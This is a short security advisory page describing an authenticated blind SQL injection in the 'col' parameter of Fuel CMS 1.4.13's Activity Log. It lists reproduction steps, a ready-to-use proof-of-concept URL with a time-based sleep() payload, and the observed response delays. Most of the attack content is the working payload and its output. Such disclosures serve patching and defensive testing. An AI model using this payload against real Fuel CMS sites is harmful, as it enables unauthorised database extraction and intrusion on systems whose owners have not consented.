Fuel CMS 1.4.13 SQL Injection

2021.11.25
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Fuel CMS 1.4.13 - 'col' Parameter Blind SQL Injection (Authenticated) # Date: 2021-04-11 # Exploit Author: Rahad Chowdhury # Vendor Homepage: https://www.getfuelcms.com/ # Software Link: https://github.com/daylightstudio/FUEL-CMS/archive/1.4.13.zip # Version: 1.4.13 # Tested on: Kali Linux, PHP 7.4.16, Apache 2.4.46 Steps to Reproduce: 1. At first login your panel 2. then go to "Activity Log" menu 3. then select any type option 4. their "col" parameter is vulnerable. Let's try to inject Blind SQL Injection using this query "and (select * from(select(sleep(1)))a)" in "col=" parameter. POC: http://127.0.0.1/fuel/logs/items?type=debug&search_term=&limit=50&view_type=list&offset=0&order=desc&col=entry_date and (select * from(select(sleep(1)))a)&fuel_inline=0 Output: By issuing sleep(0) response will be delayed to 0 seconds. By issuing sleep(1) response will be delayed to 1 seconds. By issuing sleep(5) response will be delayed to 5 seconds. By issuing sleep(10) response will be delayed to 10 seconds


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top